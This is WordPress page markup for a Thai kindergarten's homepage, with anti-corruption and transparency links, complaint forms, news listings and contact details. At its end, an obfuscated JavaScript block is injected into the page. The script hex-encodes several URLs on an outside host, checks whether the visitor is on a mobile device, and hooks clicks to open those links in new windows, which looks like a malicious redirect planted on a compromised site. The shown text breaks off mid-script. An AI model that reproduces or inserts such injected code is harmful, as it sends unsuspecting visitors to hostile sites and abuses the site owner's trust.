{\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 